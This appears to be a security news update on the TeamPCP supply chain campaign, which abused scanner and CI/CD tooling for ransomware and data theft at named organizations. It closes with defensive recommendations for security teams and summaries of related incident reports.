Key Takeaway
TeamPCP, a threat actor group weaponizing security scanning tooling in supply chain attacks, has expanded its campaign through April 1, 2026, with confirmed victims including Databricks and AstraZeneca across dual ransomware and data exfiltration operations. This fifth intelligence update extends coverage from Update 004 and consolidates two days of new developments. Affected organizations should audit CI/CD and scanner tooling, hunt for lateral movement from build infrastructure, and verify backup isolation immediately.
TeamPCP Supply Chain Campaign — Update 005 (Through April 1, 2026)
Disclosure Date: April 1, 2026 | Campaign Designation: TeamPCP | Report Version: v3.0 Update 005
Breach Overview
The threat actor group tracked as TeamPCP continues to execute an active supply chain campaign first documented in the intelligence report "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). This fifth update consolidates two days of operational intelligence spanning March 31 through April 1, 2026, extending coverage from Update 004, which closed on March 30 and covered the Databricks investigation, dual ransomware operations, and an AstraZeneca data release.
The campaign name reflects TeamPCP's core tradecraft: weaponizing security scanning tooling to gain footholds within target environments. Rather than exploiting perimeter vulnerabilities through conventional means, the group embedded malicious functionality into tools that defenders and developers actively trust and invoke within CI/CD pipelines and security workflows.
What Is Known About the Attack Vector
Based on prior updates to this report series, TeamPCP's intrusion chain begins at the software supply chain layer. The group has leveraged compromised or malicious packages, scanner plugins, or build dependencies that execute attacker-controlled code during routine security or build operations. This approach grants execution context with elevated trust, often running inside hardened environments that would otherwise block external payloads.
Update 004 documented parallel ransomware operations running alongside data exfiltration, indicating TeamPCP operates with a dual-track monetization model: encrypting infrastructure for ransom while simultaneously staging exfiltrated data for public release or sale. The AstraZeneca data release documented in Update 004 confirms that at least one major enterprise target sustained confirmed data exfiltration resulting in public exposure.
Affected Organizations and Exposed Data
Confirmed targets across the campaign span enterprise technology and life sciences sectors. Databricks was named in Update 004 as an organization under active investigation in connection with this campaign. AstraZeneca sustained a data release, though the precise scope of records exposed — including whether patient data, intellectual property, or internal credentials were included — has not been fully quantified in public disclosures as of April 1, 2026.
The supply chain intrusion vector means the total affected population extends beyond directly breached organizations. Any enterprise consuming compromised packages or tooling from affected upstream vendors or repositories carries potential secondary exposure. Security teams should not treat this as a point-in-time, single-victim incident.
Full victim counts and data classification details for the March 31–April 1 period covered by this update have not been released in public intelligence at the time of this writing. This report will be updated as further specifics are disclosed.
Ransomware Operations
TeamPCP ran dual ransomware operations documented through the Update 004 period. The use of dual ransomware — deploying two distinct ransomware families against the same target, either sequentially or simultaneously — complicates recovery operations. Defenders restoring from backup after neutralizing one encryption event may face a second active payload, or may find that backup infrastructure was itself targeted during the dwell period.
No specific ransomware family names or CVE identifiers have been attributed to TeamPCP's payload deployment in the publicly available report extracts reviewed for this article. Attribution to specific tooling will be updated as threat intelligence sources publish additional indicators.
Recommended Actions for SOC and Security Engineering Teams
Audit your build and scan tooling immediately. Any security scanner, SAST tool, dependency checker, or CI/CD plugin introduced into pipelines over the past 90 days warrants integrity verification. Compare installed versions against vendor-signed manifests. Look for unexpected network egress from build agents or scanner processes.
Hunt for lateral movement from build infrastructure. TeamPCP's entry via scanner tooling means initial access likely materialized inside a build agent, developer workstation, or security tooling server — not at the network perimeter. Review lateral movement from these asset classes in your SIEM and EDR telemetry.
Validate backup integrity and isolation. Given dual ransomware deployment, confirm that backup systems are not reachable from compromised build or scanner infrastructure. Test restoration procedures now, before an encryption event forces the issue.
Monitor threat intelligence feeds for Databricks- and AstraZeneca-adjacent indicators. If your organization uses Databricks as a data platform or has supply chain relationships with AstraZeneca or its contractors, treat any shared credentials, API tokens, or pipeline integrations as potentially compromised pending further investigation.
Apply zero-trust principles to scanner and tooling processes. Restrict outbound network access from security tooling. Scanner processes should not require broad internet egress. Block unexpected outbound connections from these processes at the host firewall level.
Organizations seeking the full indicator set and technical annexes should reference the complete TeamPCP intelligence report series, with the base report dated March 25, 2026, and prior updates through April 1, 2026.
Original Source
SANS ISC
Related Articles
US Justice Department, Canada, and Germany Dismantle Four Major IoT Botnets Behind Record DDoS Attacks
The U.S. DOJ, alongside Canadian and German authorities, dismantled four major IoT botnets—Aisuru, Kimwolf, JackSkid, and Mossad—that compromised over three million devices and launched hundreds of thousands of DDoS attacks. The disruption targeted infrastructure used to attack Department of Defense IPs and aimed to prevent further infections and attacks. Users should audit and update IoT devices and monitor for suspicious activity.
Cisco Talos Links Large-Scale Credential Harvesting Campaign to React2Shell Exploitation
Cisco Talos has attributed a large-scale credential harvesting operation to a tracked threat cluster exploiting the React2Shell vulnerability to steal AWS secrets, SSH keys, GitHub tokens, Stripe API keys, database credentials, and shell history at scale. The campaign used automated post-exploitation tooling to sweep compromised systems for secrets across multiple credential categories simultaneously. Affected organizations should immediately patch React2Shell, rotate all exposed secrets, and review cloud and source control access logs using IOCs published by Talos.
Drift Protocol Loses $280 Million After Attacker Seizes Security Council Admin Controls
Drift Protocol, a Solana-based decentralized perpetuals exchange, lost at least $280 million after an attacker compromised the signing keys of its Security Council multisig and used administrative privileges to drain protocol-controlled vaults. The attack targeted the governance layer rather than a smart contract vulnerability, exploiting insufficient key management practices among Security Council signers. Affected users should withdraw remaining funds, revoke token approvals, and avoid unofficial recovery contracts.
Vacant Property Mail Interception: How Threat Actors Convert Drop Addresses Into Fraud Infrastructure
Flare research documents how threat actors register vacant properties as mail drop addresses by abusing USPS Change of Address mechanisms and synthetic identities to intercept physical mail containing PII, financial credentials, and authentication material. The methodology chains public foreclosure data, dark web identity documents, and reshipping mules into a functional fraud pipeline targeting bank card deliveries, government correspondence, and OTP letters. Individuals should enroll in USPS Informed Delivery and freeze their addresses online; security teams should re-evaluate physical mail as a weak authentication channel.